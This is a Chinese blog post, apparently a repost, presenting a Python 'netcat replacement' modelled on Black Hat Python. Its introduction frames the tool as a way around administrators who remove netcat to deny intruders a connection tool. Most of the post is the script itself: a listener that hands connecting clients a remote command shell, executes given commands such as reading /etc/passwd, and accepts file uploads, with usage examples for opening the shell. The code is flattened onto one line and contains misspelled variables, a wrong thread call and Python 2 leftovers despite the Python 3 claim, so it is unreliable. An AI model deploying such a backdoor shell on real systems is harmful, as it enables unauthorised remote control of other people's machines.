2. 科技
  3. 取代netcat

取代netcat

it2025-05-15  31

前言

众所周知,netcat是网络界的瑞士军刀,它的主要作用是:提供连接其他终端的方法,可以上传文件,反弹shell等等各种利于别人控制你电脑的操作。所以聪明的系统管理员会将它从系统中移除,这样当别人渗透进入你的系统,也没有现成的连接工具给他们用。

代码实现

import sys import socket import getopt import threading import subprocess #定义一些全局变量 listen = False command = False upload = False execute = "" target = "" upload_destination = "" port = 0 def usage(): print("BHP Net Tool") print() print("Usage: bhpnet.py -t target_host -p port") print("-l --listen - listen on [host]:[port] for incoming cennections") print("-e --execute=file_to_run - execute the given file upon receiving a connection ") print("-c --command - initialize a command shell") print("-u --upload=destination - upon receiving connection upload a file and write to [destinction]") print() print() print("Examples: ") print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c") print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=C:\\target.exe") print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"") print("echo 'ABCDEFGHIJK' | ./bhpnet.py -t 192.168.0.1 -p 8888") sys.exit(0) def main(): global listen global port global execute global command global upload_destincation global target if not len(sys.argv[1:]): usage() try: opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen" ,"execute","tarhet", "port", "command", "upload"]) except getopt.GetoptError as err: print(str(err)) usage() for o,a in opts: if o in ("-h", "--help"): usage() elif o in ("-l", "--listen"): listen = True elif o in ("-e", "--execute"): execute = a elif o in ("-c", "--commandshell"): command = True elif o in ("-u", "--upload"): upload_destinction = a elif o in ("-t", "--target"): target = a elif o in ("-p", "--port"): port = int(a) else: assert False,"Unhandle Option" #判断我们是在监听还是仅仅从标准输入发送数据 #listen为False,len(target)大于0,port > 0 三个条件同时成立,则证明: #是从标准输入读取数据,即:从标准输入读取数据,发送到监听端(服务端)。 #这里的标准输入可以来自键盘输入,亦可以来自文件重定向。 if not listen and len(target) and port > 0: #从命令行(标准输入)读取数据 #这里将阻塞,所以在不想向标准输入发送数据时:要发送CTRL-D buffer = sys.stdin.read() # 将标准输入的数据发送到监听端 client_sender(buffer) #如果上面的if语句没被执行,那么就说明这个程序是作为监听端了。 #我们开始监听并准备上传文件,执行命令 #放置一个反弹shell #具体操作取决于你用的命令行选项 if listen: server_loop() def client_sender(buffer): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: #连接到目标主机 client.connect((target, port)) if len(buffer): client.send(buffer) while(True): #现在等待数据回传 recv_len = 1 response = "" while recv_len: data = client.recv(4096) recv_len = len(data) response += data if recv_len < 4096: break print(response,) #等待更多输入 buffer = raw_input("") buffer += "\n" #发送出去 client.send(buffer) except: print("[*] Exception! Exiting") client.close() def server_loop(): global target #如果没有定义目标,则监控所有端口 if not len(target): target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((target,port)) server.listen(5) while(True): client_socket, addr = server.accept() #分拆一个线程处理新的客户端 client_thread = threading.Thread(target=client_handler, args = (client_socket,)) client.start() def run_command(command): command = command.rstrip() try: output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True) except: output = "Falied to execute command.\r\n" return output def client_handler(client_socket): global upload global execute global command if len(upload_destination): #读取所有的字符并写入目标 # (目标是一个文件,文件名跟在-u后面,这个操作就是将客户端传过来的数据写进文件里) file_buffer = "" while True: data = client_socket.recv(1024) if not data: break else: file_buffer += data #现在将接受到的数据file_buffer写进文件里 try: file_descriptor = open(upload_destinction, "wb") file_descriptor.write(file_buffer) file_descriptor.close() #向另一端(即客户端)发送确认报文,确认文件已成功接收 client_socket.send("Successful saved file to %s\r\n" % upload_destinction) except: client_socket.send("Failed to save file to %s\r\n" % upload_destinction) #检查命令执行 if len(execute): output = run_command(execute) client_socket.send(output) #如果需要一个命令行shell,那么我们进入另一个循环 if command: while True: #跳出一个窗口 client_socket.send("<BHP: #> ") #现在我们接受文件直至发现换行符(即当你输入完命令后会按回车) cmd_buffer = "" while "\n" not in cmd_buffer: cmd_buffer += client_socket.recv(1024) #执行命令,并且将命令的输出结果保存在response里 response = run_command(cmd_buffer) # 返回相应数据 client_socket.send(response) if __name__ == "__main__": main()

注意,我这个代码是python3的,如果想看python2的,看这位大神的博客

输出

将bhpnet.py作为客户端,连接百度:echo -ne "GET / HTTP/1.1\r\nHost:www.baidu.com\r\n\r\n" | ./bhpnet.py -t www.baidu.com -p 80

反弹一个shell(这里有-l参数的命令行是作为监听端,即服务端。没-l参数的作为客户端)。监听端命令:./bhpnet.py -p 5555 -c -l 客户端命令:./bhpnet.py -t 127.0.0.1 -p 5555

上传文件

小总结

或许经历了前面TCP服务端与TCP客户端分离的形式,你会分不清什么时候bhpnet.py作为服务端,什么时候作为客户端。这里可以简单认为:有-l参数的就是服务端。因为只有服务端会监听端口。

转载于:https://www.cnblogs.com/busui/p/6882744.html

相关资源:python取代netcat过程分析
最新回复(0)